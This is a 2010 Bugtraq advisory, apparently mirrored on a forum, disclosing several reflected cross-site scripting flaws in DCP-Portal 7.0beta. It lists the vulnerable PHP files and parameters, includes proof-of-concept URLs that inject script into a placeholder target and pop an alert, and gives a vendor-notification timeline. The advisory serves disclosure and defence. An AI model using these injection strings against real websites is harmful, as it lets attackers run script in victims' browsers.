DCP-Portal Multiple XSS Vulnerabilities

看板Bugtraq作者rimsa.時間15年前 (2010/07/08 04:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

Title: DCP-Portal Multiple XSS Vulnerabilities Vendor: Worxware Product: DCP-Portal Tested Version: 7.0beta Threat Class: XSS Severity: High Remote: yes Local: no Discovered By: Andrei Rimsa Alvares =3D=3D=3D=3D=3D Description =3D=3D=3D=3D=3D Multiple XSS vulnerabilities found in the DCP-Portal. 1. common/components/editor/insert_image.php=2C modules/newsletter/insert_i= mage.php=2C php/editor.php The variable $upload_failure_report gets user input from http get request= variable "Image" when the action of deleting an uploaded file fails. Later= this variable is outputted to the page without proper sanitization. 2. modules/gallery/view_img.php Page title can be modified by changing the http request variable "imgtitl= e". Since no sanitizer is used=2C an XSS occurs on line 2. Another vulnerability exists if magic quotes is turned off. The http requ= est variable "imagename" gets outputted on the java script function documen= t.write between simple quotes on line 27. 3. modules/tips/show_tip.php Http request variable "newsId" gets outputted to the page without proper = sanitization on line 14. =3D=3D=3D=3D=3D Impact =3D=3D=3D=3D=3D Malicious java script code can be executed in the context of the affected w= eb site. =3D=3D=3D=3D=3D Proof of Concept =3D=3D=3D=3D=3D All proof of concepts display a java script alert containing the message "X= SS". 1. common/components/editor/insert_image.php=2C modules/newsletter/insert_i= mage.php=2C php/editor.php http://target/common/components/editor/insert_image.php?MyAction=3DDelete= &Image=3D%3Cscript%3Ewindow.alert(String.fromCharCode(88=2C83=2C83))=3B%3C/= script%3E http://target/modules/newsletter/insert_image.php?MyAction=3DDelete&Image= =3D%3Cscript%3Ewindow.alert(String.fromCharCode(88=2C83=2C83))=3B%3C/script= %3E http://target/php/editor.php?MyAction=3DDelete&Image=3D%3Cscript%3Ewindow= ..alert(String.fromCharCode(88=2C83=2C83))=3B%3C/script%3E 2. modules/gallery/view_img.php http://target/modules/gallery/view_img.php?imgtitle=3D%3C/title%3E%3Cscri= pt%3Ewindow.alert(String.fromCharCode(88=2C83=2C83))=3B%3C/script%3E (requires magic_quotes_gpc =3D off) http://target/modules/gallery/view_im= g.php?imagename=3D%22')=3Bwindow.alert('XSS')=3Bdocument.write('%22 3. modules/tips/show_tip.php http://target/modules/tips/show_tip.php?newsId=3D%3Cscript%3Ewindow.alert= (String.fromCharCode(88=2C83=2C83))=3B%3C/script%3E =3D=3D=3D=3D=3D Workaround =3D=3D=3D=3D=3D No workaround available at the time. =3D=3D=3D=3D=3D Disclosure Timeline =3D=3D=3D=3D=3D June=2C 16 2010 - Vendor notification. July=2C 07 2010 - No vendor reply. Public disclosure. =3D=3D=3D=3D=3D References =3D=3D=3D=3D=3D http://www.dcp-portal.org http://www.worxware.com =20 _________________________________________________________________ Hotmail: Trusted email with powerful SPAM protection. https://signup.live.com/signup.aspx?id=3D60969=

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 rimsa. 的文章

文章代碼(AID): #1CDDp-s- (Bugtraq)